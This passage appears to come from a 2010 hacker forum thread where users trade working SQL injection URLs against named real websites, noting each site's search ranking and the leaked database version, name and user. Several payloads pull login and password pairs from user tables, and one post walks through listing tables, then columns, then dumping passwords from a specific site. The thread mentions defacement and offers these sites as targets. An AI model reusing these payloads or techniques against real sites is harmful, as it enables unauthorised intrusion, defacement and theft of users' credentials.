P.S. don't make me angry with your stupid nationalist defacements, or it will end badly!
and now, continuing the defacement topic: I noticed that when you open the main page of the defaced site, the data is loaded from http://trytobe.us/
So I can say: here, go deface your own site
Code:
http://trytobe.us/account.php?id=-1+union+select+1,concat(login,char(58),user_passwo rd),3,4,5,6+from+users+--+
http://www.unico94.ru/review/obzor_nalogi/?id=566+and+1=0+union+select+1,version()+--+
TIC: 130
There is also access to mysql.user, but no write privileges
http://xk5.com.ua/adv.php?id_sgroop=885+and+1=0+union+select+group_c oncat(schema_name)+from+information_schema.schemat a+--+
TIC: 30 PR: 4
http://www.i-tilzit.ru/?id=26+and+1=0+union+select+1,group_concat(table_n ame),3+from+information_schema.tables+where+table_ schema=0x76657465725f6d61696e+--+
TIC: 10 PR: 3
http://www.gorodetc.ru/business/index.php?id=12+union+select+1,group_concat(table_ name)+from+information_schema.tables+where+table_s chema=0x7975726963685f677264+--+
TIC: 40 PR: 2
http://www.ibg-property.com/category.php?id=-4+union+select+1,version(),3,4,5,6,7,8,9,10,11,12+--+
http://www.dipris.com/visual.php?article_id=186+and+1=0+union+select+1,2 ,version%28%29,4,5,6,7,8,9+--+
TIC: 10
there is access to mysql.user, but no write privileges
http://www.songsuda.com/car_details.php?id=2+UnIon+selECt+1,2,3,4,group_co ncat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46+from+informati on_schema.tables+where+table_schema=0x736f6e677375 64615f646220--+
PR: 2
http://www.krasydom.ru/index.php?l_id=293+and+1=0+union+select+1,2,3,grou p_concat(schema_name),5,6+from+information_schema. schemata--+
TIC: 40
Many schemas for different sites
http://www.eowave.com/products.php?prod=9+and+1=0+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18+from+customer
http://www.pogoda.v.ua/index.php?id=13+and+1=0+union+select+1,version(),3 ,4,5+--+
TIC: 10
http://www.rfn.spb.ru/index.php?cat=contacts&page=branch&branch=3+UnIon+selECt+1,2,version(),4,5,6,7,8,9,10 ,11,12,13,14+--+
TIC: 110 PR: 3
http://www.volga-rm.ru/catalogue/?catalogue&group=00000002202+union+select+1,2,3,group_concat( table_name),5,6,7,8,9+from+information_schema.tabl es+where+table_schema=0x623132333035--+
TIC: 10
Terminolog
05.09.2010, 19:50
Code:
http://www.kinoglaz.fr/u_fiche_film.php?num=2010-999.9+union+select+1,2,3,4,5--
TIC 60
PR 4
Code:
http://www.bloody-disgusting.com/platinumdunes/entry.php?id=9-999.9+union+select+1,2,3,4,5,6--
TIC 100
PR 5
http://www.modularsquare.com/products.php?prod=-158+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27
daniel_1024
05.09.2010, 20:41
shop:
Code:
http://www.chemicalshop.biz/view.php?id=4509+and+1=0+union+select+0,1,version( ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Version: 4.0.27-max-log
Database: db122374831
User: dbo122374831@212.227.127.45
Code:
http://ovp.site50.net/ovp/gallery.php?id=55809+and+1=0+union+select+0,1,2,3, version(),5,6,7,8,9,10,11,12
Version: 5.0.91-community
Database: a6123114_ovp2
User: a6123114_ovp2@10.50.0.60
Code:
http://www.smachno.biz/index.php?id=25509+and+1=0+union+select+0,1,2,3,4, 5,6,7,version(),9,10
Version: 5.1.42
Database: smachno_smachno
User: smachno_smachno@localhost
Code:
http://www.bystock.biz/index.php?id=2409+and+1=0+union+select+0,version() ,2,3,4,5,6
Version: 5.0.89-community
Database: vulkan_stock
User: vulkan_stock@localhost
PR4
Code:
http://www.tierra-inca.com/album/photos/view.php?lg=it&id=4509+and+1=0+union+select+1,2,3,4,5,6,7,8,9,ver sion(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39+--+
Code:
http://vision-egy.net/products.php?id=6+and+1=0+union+select+1,version() ,3
http://www.rotary7040.com/clubsite.php?id=4586+and+1=0+UnIon+selECt+1,2,grou p_concat(,user(),version()),4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+
PR: 4
http://www.kkfi.org/program.php?id=63+group+by+24+--+
daniel_1024
05.09.2010, 21:01
BENCHMARK
psa.org.au
Version: 5.0.32-Debian_7etch10-log
Database: psa_www
User: psa_www_ro@localhost
output all the tables:
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(25,@o :=CONCAT(@o,0x0d0a,(SELECT @i:=table_name from information_schema.tables WHERE table_schema=0x7073615f777777 and table_name>@i order by table_name LIMIT 1))),@o),0x696e6a64617461656e64),4--
then the columns:
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(6,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=column_name) from information_schema.columns WHERE table_schema=0x7073615f777777 and table_name = 0x55736572 and column_name>@i order by column_name LIMIT 1))),@o),0x696e6a64617461656e64),4--
and dump the data:
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(55,@o :=CONCAT(@o,0x0d0a,(SELECT concat(Password,0x3a,@i:=ID) from psa_www.User WHERE ID>@i order by ID LIMIT 1))),@o),0x696e6a64617461656e64),4--
that's it, page 1300))
Version(): 5.0.82sp1
Database(): mindsmack
User(): bg_mindsmack
Code:
http://www.ortega.com/products/products.php?id=6+and+1=0+union+select+1,2,3,4,5,g roup_concat(table_name),7,8,9,10+from+information_ schema.tables+--+
PR5
http://www.wptgroup.com/products.php?id=4+union+select+1,2,3,4,5,6,7,8,9+f rom+msysaccessobjects
http://www.riddim.de/new.php?id=-330+union+select+1,2,3,4,concat(username,char(58), password),6,7,8,9,10,11,12,13,14,15,16,17,18+from+ joomla.jos_users+--+
http://nakano.no-ip.org/lege/diary-new.php?id=-2138+union+select+1,2,3,4,5,6,concat(user,char(58) ,password),8,9+from+mysql.user+--+